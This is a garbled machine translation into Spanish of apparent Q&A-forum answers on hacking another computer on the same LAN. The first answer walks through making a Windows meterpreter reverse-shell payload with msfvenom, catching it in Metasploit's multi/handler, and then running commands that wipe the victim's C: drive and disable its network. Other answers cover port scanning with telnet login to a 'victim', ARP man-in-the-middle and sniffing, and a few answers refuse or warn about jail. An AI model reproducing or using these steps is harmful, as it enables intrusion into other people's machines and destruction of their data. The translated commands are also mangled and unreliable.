Cómo hackear una computadora en la misma red

Oye,

En realidad, puedes hackear la computadora que está en tu red.

Lo que necesitas es

  1. Kali linux OS
  2. Pocos conocimientos de línea de comando
  3. Un poco de paciencia

Como todos sabemos, podemos hacer cosas increíbles con la línea de comandos, incluso cualquier cosa.

Puede hacer una CARGA DE PAGO y luego ejecutar el archivo en otra computadora (víctima) …

Así que ahora sigue algunos pasos:

  • Para hacer la carga útil, debe escribir el siguiente código:

msfvenom -p windows / meterprete / reverse_tcp –platform windows -a x86 -f exe LHOST = xxxx LPORT = 444 -o /root/…../virus.exe

En lugar de xxxx, debe escribir su IP , por ejemplo, 10.0.45.99 o 192.168.45.99

Creará un archivo .exe . Mueva o copie este archivo .exe en otra computadora y ejecútelo.

Ahora el siguiente paso es usar Metasploit Framework

  • En la terminal de kali escribe el siguiente código

msfconsole

Se abrirá Metasploit Framework.

Luego escriba el siguiente código

use multi / handler // usando multi handler luego presione enter
establecer PAYLOAD windows / meterpreter / reverse_tcp // presione enter
establezca LHOST xxxx // qué ip ha escrito al hacer la carga útil presione enter
set LPORT 444 // presione enter
explotar // ahora presione enter y explotar
shell // y funcionará como símbolo del sistema de Windows

Ahora escribe algo en el comando

Puedes escribir cualquier comando.

P.ej,

Para deshabilitar internet:

interfaz netsh interfaz configurada “Conexión de área local” DESACTIVAR

eliminando Os solo ingrese

del C: \ *. * / f / s / q

Eliminará todos los archivos de la unidad C de la computadora de la víctima y el sistema operativo Crash.

Funciona para LAN . Significa que la víctima estará conectada a la misma red que usted ha conectado.

advertencia:

Mientras copia el código, ignore el operador // y también el texto después de esto.

He usado algunas IP al azar, por ejemplo, así que no pienses que son mías o de cualquier otra persona.

Sé diferente !

AR danés

Puedo enseñarle un truco simple de piratería informática para esto, necesita saber la dirección IP de la víctima.

Empecemos

1) Prepare la dirección IP de la víctima. (por ejemplo: 101.23.53.70)

2) Descargue e instale Advanced Port Scanner.

3) Abra Advanced Port Scanner y escriba la dirección IP en la columna derecha y haga clic en Escanear.

4) Enumerará todos los puertos abiertos de la PC o enrutador de la víctima. (por ejemplo: puerto 91)

5) Después de recuperar la dirección IP y los puertos abiertos de la víctima, abra el símbolo del sistema (CMD)

y escriba: telnet [DIRECCIÓN IP] [PUERTO]

por ejemplo: telnet 101.23.53.70 91

6) Ahora se le pedirá que ingrese la información de inicio de sesión, simplemente escriba el nombre de usuario y la contraseña y presione Entrar.
Si no se utiliza una contraseña, simplemente escriba el Nombre de usuario.

¡Hecho! Ahora tendrá acceso a todos los archivos y documentos de la víctima navegando con CMD (use cd, copy, delete, mv … para hacer todos los trucos).

Disfrutar

  1. Sistema de detección. Puede usar algún tipo de sniffer para ese propósito, o incluso intentar hacer ping con fuerza bruta de cada dirección IP válida (no recomendado).
  2. Identificación del sistema. Necesita saber con qué sistema está tratando. Algunos sistemas proporcionan esta información abiertamente, en caso de que otros tengan que identificarla por su comportamiento.
  3. Investigación sobre el sistema. Está intentando recopilar tanta información sobre el sistema como sea posible sin interferir con él. Si ya está familiarizado con ese sistema, puede omitir ese punto.
  4. Exploración. Intente revelar características no documentadas del sistema. Te refieres a hackear, no crackear, ¿no?

A2A

Hay videos en mi canal de YouTube para hackear la computadora en la misma red, así que vaya a través del enlace que proporcioné a continuación

Para obtener tutoriales de piratería gratuitos, visite mi canal de YouTube. Pronto voy a comenzar un curso completo sobre piratería, así que suscríbase al canal y presione el icono de la campana para que se actualice.

canal de Youtube :-

TMH: Esto significa pirateo

grupo oficial de pirateo de Facebook: –

Inicia sesión en Facebook | Facebook

Una respuesta simple a esta pregunta sería usar Kali Linux. Tiene todo el conjunto de herramientas que necesitaría para olfatear, piratear, capturar paquetes, recopilar información, etc. Es un sistema operativo de prueba de penetración, diseñado especialmente para hackers. Puede grabar un USB en vivo de eso y hacer un arranque USB y ya está listo para comenzar. La mejor de las suertes.

Si por la misma red te refieres a la misma LAN, entonces es probable que no haya un firewall entre tú y el objetivo y que funcionen protocolos inseguros como el recurso compartido de red de Windows o NFS o RPC. Además, las transmisiones funcionan, por lo que puede encontrar todos los hosts activos con un escaneo ARP, y puede ver el tráfico de transmisión como solicitudes DHCP y realizar un ataque MITM basado en ARP. Por lo tanto, debería ser más fácil piratear otras computadoras en su hogar en comparación con las que hay en Internet.

Si tienes que preguntar … no podrías hacerlo. Si está buscando a alguien que le enseñe cómo sortear las capas de seguridad con las que están cargadas las computadoras modernas … busque en otro lugar. Si está lo suficientemente interesado, inscríbase en algunas clases. Esa es una de las primeras cosas que aprende por su cuenta mientras se le enseña teoría. Es una aplicación práctica … especialmente fácil en un entorno de laboratorio donde todas las máquinas están preparadas exactamente igual.

Usted no Es moralmente incorrecto intentar eso y puedes ser atrapado y encarcelado por mucho tiempo.

Nadie está dispuesto a enseñarte cómo hacer eso en Quora.

Existe una gran posibilidad de que quieras jugarle una mala pasada a alguien. Sin embargo, si realmente quieres saber, inscríbete a una clase de seguridad algo.

si conoce la dirección IP, haga un ssh en el sistema si simplemente no graba el paquete desde el enrutador utilizando wireshark y realiza una ingeniería social y obtiene la ip y se puede revelar más identidad en función del paquete que haya registrado

Supongo que está preguntando por obtener información que se está llevando a cabo en la red, ¿verdad?

Para esto, puede usar wireshark para obtener cada paquete en LAN.

¡Espero que funcione para ti!

Buena suerte 🙂

Usted no Es ilegal y conlleva una severa pena de cárcel.

Pregúntate * ¿por qué * quieres hacer esto?

¿Están usando ilegalmente su red? – cambiar el protocolo de acceso / contraseñas …